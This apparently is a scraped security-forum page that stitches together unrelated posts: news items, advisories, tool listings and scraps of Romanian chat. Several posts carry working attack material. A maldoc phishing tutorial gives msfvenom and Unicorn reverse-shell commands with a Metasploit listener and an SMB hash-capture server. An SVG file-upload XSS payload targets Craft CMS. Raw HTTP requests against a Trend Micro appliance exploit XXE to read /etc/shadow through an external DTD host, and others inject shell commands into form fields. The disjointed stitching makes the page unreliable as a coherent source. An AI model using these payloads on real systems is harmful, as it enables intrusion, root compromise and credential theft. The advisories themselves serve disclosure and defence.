Fi8sVrs

This is pretty interesting, the prices for Fake News as a Service have come out after some research by Trend Micro, imagine that you can create a fake celebrity with 300,000 followers for only $2,600. Now we all know this Fake News thing has been going on for a while, and of course, if it’s happening, some capitalist genius is going to monetize it and offer it as a professional service. You can read the full 77 page report by Trend here: The Fake News Machine [PDF] It’s insightful to see the types of services that are available, and how they are categorised. Now I’ve known about social media manipulation for many years (fake likes, followers, YouTube views and so on) but to see this kind of Fake News at scale, as a service is something new to me. Unfortunately there’s no technical solution to thwart this, it’s purely about education. If people don’t fact check, cross check and verify sources before disseminating them this whole Fake News situation is just going to get worse and worse. I feel like it had a serious impact on both Brexit and the Trump election, and it’s likely to stay very relevant in any large scale World events as so many people now base their opinions on what they see online. Sources: Darknet The Register

There are many ways to run a phishing campaign. The most common of them all is a typical credential harvesting attack, where the attacker sends an email to the target enticing them to click a link to a spoofed website. Running these campaigns are fairly straight forward, and a couple of tools make this very easy to do. The most common of all is likely the Social Engineer Toolkit. SET works great for cloning an existing website and setting up a PHP form to collect credentials. While this technique is very effective, it may also be a good choice to perform phishing attacks with malicious documents. Macro Attacks The most common Maldoc is a malicious Microsoft Word document. Typically these will contain embedded Macros which execute a payload when opened. Because of this, modern Windows will usually display two prompts that the user must click through before the payload is executed. Typically they must click “Enable Content” and the subsequently click “Enable Macros”. There a quite a few ways you can generate these. The most simple way is with Metasploit. As documented here, all you need to do is use msfvenom to generate some malicious visual basic code like so: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe And then paste it into the Visual Basic Editor. Set up a listener in the Metasploit framework and wait for the user to enable macros. msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.101; set LPORT 8080; run; exit -y" While you can use multiple encoding types, this attack is likely to get caught by Anti-Virus. You can use other tools besides msfvenom to generate the VBA code required for the Macro. You can also use Unicorn by TrustedSec. To generate the payload use: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro And you can catch the meterpreter shell with the same listener you would use with the msfvenom payload. OLE Attack If you like Powershell Empire more than Metasploit, Empire also has a stager for office macros. Enigma0x3 has a good blog post on how to do this. Also notable is the OLE attack. Instead of using a macro to execute a payload, you can embed a file within the document itself. By changing the icon, you may be able to trick the user into executing a bat file which contains a malicious payload. This attack is also documented in the same blog post. This attack will prompt the user before executing payload as seen below: AV Bypass Because of the success of the Macro attack method, AV vendors have been quick to adapt. If AV is causing an issue, there are a few more tools that you can use to avoid detection. LuckyStrike is a tool that was released at DerbyCon 2016. The author has a lengthy blog post on this tool that is well worth the read. LuckyStrike contains a bunch of obfuscation methods to avoid detection and can even go as far as encrypting the payload ensuring that AV sandbox will never be able to execute it for dynamic analysis. If Software Restriction Policies or EMET are what is keeping you down, wePWNise might be the tool for you. As MRWLabs explains it on thier website, “It collects information through enumeration of relevant parts of the Registry where various policy security settings are stored, and identifies suitable binaries which are safe to inject code into.” Capturing Hashes Now to get into the more exotic methods. A very novel way of capturing NTLM hashes is with a tool named WordSteal. The way WordSteal works is by embedding a reference to a file hosted on a malicious SMB server. When the document is opened, the client will try to connect to the SMB server without any user interaction. This will capture an NTLM handshake and can be sent to a password cracker just as you would do if you were running Responder within the local network. The biggest caveat here is that the client network must be able to initiate SMB connections outbound. This means that they must not be any egress rule blocking port 445. This is not always the case, but if it goes through this is a good way to collect hashes as the user does not have to do anything other than open the document. If you are able to crack domain credentials, there is a good chance you can use Microsoft Outlook to execute a payload within the target environment as described in my blog post here: From OSINT to Internal – Gaining Access from outside the perimeter This attack requires a malicious SMB server. Fortunately, we can stand this up quite easily by using Metasploit. Just run the following module: use auxiliary/server/capture/smb And it will output any handshakes that it captures. Metasploit has the option of outputting this data in a format you can send to Cain and Abel or John the Ripper. Prompting for credentials Phishery is another great tool for non-traditional credential harvesting. Phishery is written in Go, and pre-compiled binaries are available here. The way Phishery works is by using HTTP Basic Authentication delivered over SSL. This tool is very easy to use, although to bypass the warnings to the end user you will need to set up a domain with a proper SSL certificate, or they will see this: After clicking “Yes” or bypassing it all together with a valid certificate, the user will receive an authentication prompt. If they enter their credentials, you will see them posted back to the listening server. Exploits While all these require some level of social engineering, you can also exploit the target with an exploit. Recently CVE-2017-0199 was disclosed by FireEye after it had been found in the wild. This exploit targets RTF files opened with Microsoft Word. MDSec had published a blog post on how to exploit it, and a blogger wrote a step-by-step set of instructions to create a working exploit. If you don’t want to do this manually, there is also a toolkit published on GitHub for exploiting this. It can create the RTF file, host the HTA payload, and host an exe that is executed by the HTA file. The only other things you need to make it work are msfvenom and Metasploit, although with some minor modifications it could be used to deliver any other payload as well, such as a Powershell Empire stager. At the time of this writing, there is a Metasploit module in development for this attack. A pull request has been opened, and will likely be merged into the main branch soon. Source: https://www.n00py.io/2017/04/phishing-with-maldocs/

https://www.goodreads.com/shelf/show/astrophysics caută pe torrent/warez

@proxy_chainer, te-a lovit astenia de vară?

CyberSecurity researchers found the Malware in Britney Spears Instagram account, where attacker appeared malicious comment post in her account. According to research, the Hackers group named TURLA behind the Malware, it's a Russian group known for targeting governments and officials. Cyber attackers spreading Malware through post the comment in world most famous singer Britney Spears Instagram account. According to Eset, Malware was hidden in a Firefox browser extension. The extension uses a bit.[ly] URL to reach its C&C, but the URL path is nowhere to be found in the extension code. In fact, it will obtain this path by using comments posted on a specific Instagram post. The one that was used in the analyzed sample was a comment about a photo posted to the Britney Spears official Instagram account. Technical analysis This Firefox extension implements a simple backdoor. It will first gather information on the system it is running on and send it to the C&C, encrypted using AES. This is very similar to what the extension described in the Pacifier APT white paper is doing. The backdoor component has the ability to run four different types of commands: execute arbitrary file upload file to C&C download file from C&C read directory content – send a file listing, along with sizes and dates, to C&C While we believe this to be some type of test, the next version of the extension – if there is one – is likely to be very different. There are several APIs that are used by the extension that will disappear in future versions of Firefox. For example, it uses XPCOM to write files to disk and sdk/system/child_process to launch a process. These can only be used by add-ons that will be superseded by WebExtensions starting with Firefox 57. From that version onwards, Firefox will no longer load add-ons, thus preventing the use of these APIs. Conclusion The fact that the Turla actors are using social media as a way to obtain its C&C servers is quite interesting. This behavior has already been observed in the past by other threat crews such as the Dukes. Attackers using social media to recover a C&C address are making life harder for defenders. Firstly, it is difficult to distinguish malicious traffic to social media from legitimate traffic. Secondly, it gives the attackers more flexibility when it comes to changing the C&C address as well as erasing all traces of it. It is also interesting to see that they are recycling an old way of fingerprinting a victim and finding new ways to make the C&C retrieval a bit more difficult. Via: blog.hackersonlineclub.com

We managed to get a recording of most of the talks during the 10th edition. While the recording quality is not the best, we hope it will benefit to people who couldn’t attend. For DevOops Redux, the recording quality was unfortunately really bad but the CERN did an awesome one the day before Insomni’hack. Seeing how great theirs was we would have been ashamed to publish ours, so here’s the link to this great talk hosted on the CERN’s site : https://cds.cern.ch/record/2256987?ln=en And here’s the link to the Insomni’hack 2017 Youtube playlist : Source

https://rstforums.com/forum/topic/23949-how-to-make-a-laser-alarm

Due to insufficient checking of privileges, it is possible to access the OTRS Install dialog of an already installed instance, which enables an authenticated attacker to change the database settings, superuser password, mail server settings, log file location and other parameters. Versions affected include OTRS 5.0.x, OTRS 4.0.x, and OTRS 3.3.x -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2017-018 Product: OTRS Manufacturer: OTRS Affected Version(s): OTRS 5.0.x, OTRS 4.0.x, OTRS 3.3.x Fixed Version(s): OTRS 5.0.20, OTRS 4.0.24, OTRS 3.3.17 Tested Version(s): 5.0.19 Vulnerability Type: Access to Installation Dialog Risk Level: High Solution Status: Fixed Manufacturer Notification: 2017-05-30 Solution Date: 2017-06-06 Public Disclosure: 2017-06-08 CVE Reference: CVE-2017-9324 Author of Advisory: Sebastian Auwarter, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: OTRS is a ticket management system. The manufacturer describes the product as follows (see [1]): "OTRS is one of the most flexible web-based ticketing systems used for Customer Service, Help Desk, IT Service Management. With a fast implementation and easy customization to your needs it helps you reducing costs and increasing the efficiency and transparency of your business communication." Due to insufficient checking of privileges, it is possible to access the OTRS Install dialog of an already installed instance, which enables an authenticated attacker to change the database settings, superuser password, mail server settings, log file location and other parameters. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The recommended way to install OTRS is to use the installation dialog found at http://vulnerablehost/otrs/installer.pl. After successful installation, OTRS prevents further use of this installer. Any authenticated user can access the installation functionality of OTRS by referencing the installer via a crafted url. The URLs that can be used to access the installer can be one of the following: * http://vulnerablehost/otrs/index.pl?Action=Installer * http://vulnerablehost/otrs/index.pl?Action=Installer;Subaction=Intro * http://vulnerablehost/otrs/index.pl?Action=Installer;Subaction=Start * http://vulnerablehost/otrs/index.pl?Action=Installer;Subaction=System At the end of each "installation" step, the user is redirected to the start page. Therefore, the next step of the installation dialog must be called directly using the Intro, Start (Database) or System subaction, respectively. By Using the installer tool, an attacker can change a variety of parameters, including the superuser password, database settings, mail server settings, log file location and instance ID. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): On a newly installed instance of OTRS, logged in as any valid user, navigate to index.pl?Action=Installer;Subaction=Start to change the database parameters or to index.pl?Action=Installer;Subaction=System to get a superuser password. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: This vulnerability is fixed in the latest versions of OTRS, and it is recommended to upgrade to the latest patch level. Fixed releases can be found at: https://www.otrs.com/category/release-and-security-notes-en/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2017-05-30: Vulnerability discovered 2017-05-30: Vulnerability reported to manufacturer by project member 2017-06-06: Vulnerability reported to manufacturer via security advisory 2017-06-06: Fix provided by manufacturer 2017-06-06: Vulnerability disclosed by manufacturer 2017-06-08: Public release of the security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for OTRS https://www.otrs.com/ [2] SySS Security Advisory SYSS-2017-018 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-018.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Sebastian Auwarter of SySS GmbH. E-Mail: sebastian-auwaerter@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Auwaerter.asc Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJZORr6AAoJEOmjDUji8Ki2Lt0P/iZ6DLr1ezWAhEHLxEdsrmGT OTpXaT3ANvvzWf4HH5NsIF/Q+kZAymNsW53MXxLJA0wZCj9t5cKR4UHptgd83W0h oNe3yOnYWPMf0L25PqNBy0wWVLLKL2Zme3xhSEYiEmbOCYERjr6IeX5td1i+PwwC wOkrYt/98o+XwtkMk25QyrQ0/IypNescPX2wj6zkOHkv0FcZUDsrAyOPFYBEyQ9q 7VUnNnUZlZK5h8hJZQ63c+5I/Ql5FxqtzPdkiZeYkj3oavaipWTKm2goCFzU8fA1 V1V5/ohQNd1Rk5sH+0NtC3KIMhbCA2hmH586jyDAgtZg6oRPXrHM4wFZE2SICKWy HeXIc1HUs6cvPFkFaxTNFL3Grb5NBuDBGxgwC7IQQ23pR3vYU3ckXC7UOj69sYSS bvGtcleYU17J7ND3YgQeVzMr58S/9i/mhZ/ya4WIGCp+9zh4YZiKzGK0PqFON+nn OQrQBLTwwTZz/VJJyWeaNWc7m4R4BXwi/BeYlAV3t51srWwCUV23NxDEXjKu4TZ7 0f93N0qYcSpVi0CIwPtA5IDTVNhOWSLzeco1zitJvDq5V9l4gbyAISXOFV12RxSh cduM6hUc6ALp1UziHQRpD8xUhFbF03WVysN5wHXrM9+d+TaVZ92KOaCv6VIWDVBh 63bQpoUQZ8L4LfzusTTl =EuyE -----END PGP SIGNATURE----- Source

# Exploit Title: Craft CMS 2.6 - Cross-Site Scripting/Unrestricted File Upload # Date: 2017-06-08 # Exploit Author: Ahsan Tahir # Vendor Homepage: https://craftcms.com # Software Link: http://download.craftcdn.com/craft/2.6/2.6.2981/Craft-2.6.2981.zip # Version: 2.6 # Tested on: [Kali Linux 2.0 | Windows 8.1] # Email: mrahsan1337@gmail.com # Contact: https://twitter.com/AhsanTahirAT Release Date: ============= 2017-06-08 Product & Service Introduction: =============================== Craft is a content-first CMS that aims to make life enjoyable for developers and content managers alike. Abstract Advisory Information: ============================== Ahsan Tahir, an independent security researcher discovered a Persistent Cross-Site Scripting Vulnerability through Unrestricted File Upload of SVG file in Craft CMS (v2.6) Vulnerability Disclosure Timeline: ================================== 2017-06-08: Found the vulnerability. 2017-06-08: Reported to vendor. 2017-06-08: Published. Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ The security risk of the xss vulnerability is estimated as medium with a common vulnerability scoring system count of 3.6. Exploitation of the persistent xss web vulnerability requires a limited editor user account with low privileged (only editing news) and only low user interaction. If attacker upload any file that can use for XSS (HTML, SWF, PHP etc..) it will not accept to uplaod as image. But for images it will stay the same. So if attacker upload SVG with JS content it will work fine and execute JS! The "Content-Type: image/svg+xml; charset=us-ascii" header will make this XSS attack work. Successful exploitation of the XSS vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious sources and persistent manipulation of affected or connected web module context. Proof of Concept (PoC): ======================= The persistent input validation vulnerability can be exploited by a low prviledged user/editor with privileges, only for editing news. After successful exploitation, this attack can be used by editor to hijack admin account! For security demonstraton or to reproduce the vulnerability follow the provided information and steps below to continue. Payload (Exploitation): <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg> [+] Manual steps to reproduce .. 1. Login with the editor account (only privilege to edit news) in Craft CMS 2. Go to 'add news' option: https://localhost/admin/entries/news/new 3. Put random values in title 4. In your attacker machine, create a file named 'xss.svg' (without quotes) and inject the payload in the file: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg> 4. Upload the xss.svg file in featured image option in Craft CMS 5. Click on Save 6. Now go to: https://localhost/s/assets/site/xss.svg 7. XSS payload execution occurs and alert pop-up with domain name Credits & Authors: ================== Ahsan Tahir - [https://twitter.com/AhsanTahirAT] Source

It's time to update your Raspberry Pi devices or risk them being infected with cryptocurrency mining malware. Older Raspberry Pi devices, such as this Raspberry Pi 2, may be more vulnerable to the malware if they haven't been updated in a while. Image: Raspberry Pi Foundation Someone has developed a simple Linux trojan designed to harness the meager power of Raspberry Pi devices to mine cryptocurrency. Raspberry Pi users may need to consider applying a recent Raspbian OS update to their devices, particularly if they are currently configured to allow external SSH connections. According to Russian security firm Dr Web, the malware Linux.MulDrop.14 exclusively targets Raspberry Pi devices to use their processing power to mine a cryptocurrency. Dr Web discovered the Raspberry Pi mining malware after its Linux honeypot machine became infected with it. The malware uses a simple Bash script to attempt to connect to Raspberry Pi devices configured to accept external SSH connections. It targets Raspberry Pi boards with the default login and password, which are 'pi' and 'raspberry', respectively. It then changes 'pi' to '\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1'. From there it installs the internet-scanning tool ZMap and the sshpass utility, and searches the network for other devices with an open port 22 to infect them. Older Raspberry Pi devices may be more vulnerable to this malware if they haven't been updated in a while. The Raspberry Pi Foundation told ZDNet sister site TechRepublic that a Raspbian OS update released late last year turned off SSH by default and forced users to change the default password. However, it warned that there could still be millions of Raspberry Pi boards that haven't been updated. Some 12.5 million of the single-board computers have been sold over the past five years, according to the official Raspberry Pi Magazine. The malware doesn't try to mine for Bitcoin, whose 'difficulty level' is too high to mine cost-effectively, even for a massive network of PCs let alone Raspberry Pi devices. However, there are numerous other cryptocurrencies that can be mined with less computational power. In 2014, malware writers experimented with Android malware to mine Dogecoins and Litecoins. Dr Web's virus analysts said the Raspberry Pi malware mines Monero, a lesser-known, but increasingly popular cryptocurrency for dark-web drug markets. Researchers in May discovered that a network of several hundred thousand PCs infected with the Adylkuzz mining malware, which used the same Windows exploit behind the WannaCry ransomware epidemic, had been toiling away on Monero blocks. At the time, Adylkuzz had generated about $43,000 over several months of mining activity. Via: zdnet.com

^ comisioanele cred, costurile de transport etc... @Shadow86 www.comenziuk.net sunt de incredere, 10$ per produs

trimite si mie link-ul, daca mai e valabil

____ _ _ _ / ___|__ _ _ __ __ _(_) |__ _ __(_)_ __ __ _ | | / _` | '_ \ / _` | | '_ \| '__| | '_ \ / _` | | |__| (_| | | | | (_| | | |_) | | | | | | | (_| | \____\__,_|_| |_|\__, |_|_.__/|_| |_|_| |_|\__,_| |___/ Beta - v0.8.7 Dashboard Finder Cangibrina is a multi platform tool which aims to obtain the Dashboard of sites using brute-force over wordlist, google, nmap, and robots.txt Requirements: Python 2.7 mechanize PySocks beautifulsoup4 html5lib Nmap (--nmap) TOR (--tor) Install: Linux git clone http://github.com/fnk0c/cangibrina.git cd cangibrina pip install -r requirements.txt Usage: usage: cangibrina.py [-h] -u U [-w W] [-t T] [-v] [--ext EXT] [--user-agent] [--tor] [--search] [--dork DORK] [--nmap [NMAP]] Fast and powerful admin finder optional arguments: -h, --help show this help message and exit -u U target site -w W set wordlist (default: wl_medium) -t T set threads number (default: 5) -v enable verbose --ext EXT filter path by target extension --user-agent modify user-agent --tor set TOR proxy --search use google and duckduckgo to search --dork DORK set custom dork --nmap [NMAP] use nmap to scan ports and services Examples: python cangibrina.py -u facebook.com python cangibrina.py -u facebook.com -v python cangibrina.py -u facebook.com -w /root/diretorios.txt -t 10 -v python cangibrina.py -u facebook.com --search -v python cangibrina.py -u facebook.com --search --dork 'site:facebook.com inurl:login' python cangibrina.py -u facebook.com -v --nmap python cangibrina.py -u facebook.com -v --nmap 'sudo nmap -D 127.0.0.1 -F facebook.com' python cangibrina.py -u facebook.com --user-agent python cangibrina.py -u facebook.com --ext php [IMPORTANT] DORK MUST BE WRITE BETWEEN QUOTES ! [Example] 'inurl:login.php' Download .zip Source: https://github.com/fnk0c/cangibrina

Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user-defined lists, where trail can be anything from domain name (e.g. zvpprsensinaix.com for Banjori malware), URL (e.g. http://109.162.38.120/harsh02.exe for known malicious executable), IP address (e.g. 185.130.5.231 for known attacker) or HTTP User-Agent header value (e.g. sqlmap for automatic SQL injection and database takeover tool). Also, it uses (optional) advanced heuristic mechanisms that can help in the discovery of unknown threats (e.g. new malware). Features Uses multiple public blacklists (alientvault, autoshun, badips, sblam etc) Has extensive static trails for identification (domain names, URLs, IP addresses or User-Agent values) Optional heuristic mechanisms for detection of unknown threats Based on Traffic -> Sensor <-> Server <-> Client Architecture Web reporting interface Installation sudo apt-get install git python-pcapy git clone https://github.com/stamparm/maltrail.git cd maltrail sudo python sensor.py Download .zip Sources: darknet.org.uk github.com

Want to get paid for a vulnerability similar to this one? Contact us at: ssd@beyondsecurity.com Vulnerabilities Summary The following advisory describes three (3) vulnerabilities found in Trend Micro Interscan Web Security Virtual Appliance version 6.5. The vulnerabilities found in Trend Micro Interscan Web Security Virtual Appliance: XML External Entity (XXE) that lead to arbitrary file disclosure Local Privilege Escalation Remote code execution Credit An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. Vendor response Trend Micro has released patches to address these vulnerabilities and issued the following advisory: https://success.trendmicro.com/solution/1117412 Vulnerabilities Details XML External Entity (XXE) that lead to arbitrary file disclosure Trend Micro Security Manager uses an outdated REST API (resteasy-jaxrs-2.3.5.Final.jar). The library suffers from an XXE vulnerability that can be exploited using Parameter Entities. Proof of Concept By sending the following POST request, an attacker can gain the victims “/etc/shadow” POST /rest/authentication/login/sso HTTP/1.1 Host: 192.168.18.129:4119 Content-Type: application/xml Content-Length: 360 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag [ <!ENTITY % start "<![CDATA["> <!ENTITY % goodies SYSTEM "file:///etc/shadow"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://192.168.18.130/combine.dtd"> %dtd; ]> <dsCredentials> <password>P@ssw0rd</password> <tenantName></tenantName> <userName>&all;</userName> </dsCredentials> Local Privilege Escalation Admin users have access via the web interface to the SSH configuration settings. The port settings are not properly handled and allow injecting shell commands as the root user. POST /SSHConfig.jsp HTTP/1.1 Host: 192.168.254.176:8443 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://192.168.254.176:8443/SSHConfig.jsp Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 150 CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&needSSHConfigure=yes&SSHSt atus=enable&SSHPort=22&op=save&cbSSHStatus=enable&btSSHPort=221 In the above code, the SSHPort= parameter does not sanitize the incoming data. An attacker can use this to inject commands that will run as root on the victim’s machine. Proof of Concept The following POST request will call the sleep command with a value of 60 seconds: POST /SSHConfig.jsp HTTP/1.1 Host: 192.168.254.176:8443 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://192.168.254.176:8443/SSHConfig.jsp Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 150 CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&needSSHConfigure=yes&SSHSt atus=enable&SSHPort=%60sleep%2010%60&op=save&cbSSHStatus=enable&btSSHPort=221 Remote code execution Trend Micro Interscan Web Security Virtual Appliance has a default user with sudo privileges named iscan. This user is locked out but it can access certain elevated functions. POST /servlet/com.trend.iwss.gui.servlet.ManageSRouteSettings?action=add HTTP/1.1 Host: 192.168.254.176:8443 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://192.168.254.176:8443/staticRouteEdit.jsp?action=add Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 259 CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&op=sroutemanage&fromurl=%2 FstaticRoutes.jsp&failoverurl=%2FstaticRouteEdit.jsp&port=&oldnetid=&oldrouter=&oldnetmask=& oldport=&netid=192.168.1.0&netmask=255.255.255.0&router=192.168.1.1&interface_vlanid_sel=eth1 In the above POST request, we can see the page has several parameters that are vulnerable and that we can inject malicious parameters through them: netid, netmask, router, and interface_vlanid_sel Proof of Concept POST /servlet/com.trend.iwss.gui.servlet.ManageSRouteSettings?action=add HTTP/1.1 Host: 192.168.254.176:8443 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://192.168.254.176:8443/staticRouteEdit.jsp?action=add Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 259 CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&op=sroutemanage&fromurl=%2 FstaticRoutes.jsp&failoverurl=%2FstaticRouteEdit.jsp&port=&oldnetid=&oldrouter=&oldnetmask=& oldport=&netid=192.168.1.0%7c%7c%60ping%20- c%2021%20127.0.0.1%60%20%23'%7c%7c%60ping%20- c%2021%20127.0.0.1%60%20%23%5c%22%20&netmask=255.255.255.0&router=192.168.1.1&inte rface_vlanid_sel=eth1 Source

Security researchers have discovered a massive malware campaign that has already infected more than 250 million computers across the world, including Windows and Mac OS. Dubbed Fireball, the malware is an adware package that takes complete control of victim's web browsers and turns them into zombies, potentially allowing attackers to spy on victim's web traffic and potentially steal their data. Check Point researchers, who discovered this massive malware campaign, linked the operation to Rafotech, a Chinese company which claims to offer digital marketing and game apps to 300 million customers. While the company is currently using Fireball for generating revenue by injecting advertisements onto the browsers, the malware can be quickly turned into a massive destroyer to cause a significant cyber security incident worldwide. Fireball comes bundled with other free software programs that you download off of the Internet. Once installed, the malware installs browser plugins to manipulate the victim's web browser configurations to replace their default search engines and home pages with fake search engines (trotux.com). The fake search engine simply redirects the victim's queries to either Yahoo.com or Google.com and includes tracking pixels that collect the victim's information. Far from legitimate purpose, Fireball has the ability to spy on victim's web traffic, execute any malicious code on the infected computers, install plug-ins, and even perform efficient malware dropping, which creates a massive security hole in targeted systems and networks. At the current, Fireball adware is hijacking users' web traffic to boost its advertisements and gain revenue, but at the same time, the adware has the capability to distribute additional malware. "Based on our estimated infection rate, in such a scenario, one out of five corporations worldwide will be susceptible to a major breach," researchers added. According to researchers, over 250 million computers are infected worldwide, 20 percent of them are corporate networks: 25.3 million infections in India (10.1%) 24.1 million in Brazil (9.6%) 16.1 million in Mexico (6.4%) 13.1 million in Indonesia (5.2%) 5.5 million In US (2.2%) Warning Signs that Your Computer is Fireball-Infected If the answer to any of the following questions is "NO," that means your computer is infected with Fireball or a similar adware. Open your web browser and check: Did you set your homepage? Are you able to modify your browser's homepage? Are you familiar with your default search engine and can modify that as well? Do you remember installing all of your browser extensions? To remove the adware, just uninstall the respective application from your computer (or use an adware cleaner software) and then restore/reset your browser configurations to default settings. The primary way to prevent such infections is to be very careful when you agree to install. You should always pay attention when installing software, as software installers usually include optional installs. Opt for custom installation and then de-select anythingia th that is unnecessary or unfamiliar. Via thehackernews.com

Security researchers at Qualys Security have discovered a Linux flaw that could be exploited to gain root privileges and overwrite any file on the filesystem on SELinux-enabled systems. The high severity flaw, tracked as CVE-2017-1000367, resides in the Sudo’s get_process_ttyname() for Linux and is related to the way Sudo parses tty information from the process status file in the proc filesystem. The Linux flaw could be exploited by a local user with privileges to execute commands via Sudo and could allow attackers to escalate their privileges to root. The Sudo’s get_process_ttyname() function opens “/proc/[pid]/stat” (man proc) and reads the device number of the tty from field 7 (tty_nr). These fields are space-separated, the field 2 (comm, the filename of the command) can contain spaces. Sudoer users on SELinux-enabled systems could escalate their privileges to overwrite any file on the filesystem with their command’s output, including root-owned files. To exploit the issue, a Sudo user would have to choose a device number that doesn’t exist under “/dev”. If the terminal isn’t present under the /dev/pts directory when the Sudo performs a breadth-first search of /dev, the user could allocate a pseudo-terminal between the two searchers and create a “symbolic link to the newly-created device in a world-writable directory under /dev, such as /dev/shm,” The Linus flaw affects all Sudo versions from 1.8.6p7 through 1.8.20, the Sudo 1.8.20p1 fixes it, the issue was rated with a CVSS3 Base Score of 7.8. Via securityaffairs.co

MailSecRep adds an Outlook button to analyze email for spoofing, hostile links, and malware attachments. Download: MailSecRep.zip (430.1 KB) Source: https://packetstormsecurity.com/files/142742/MailSecRep-Email-Analysis-Tool-For-Outlook.html

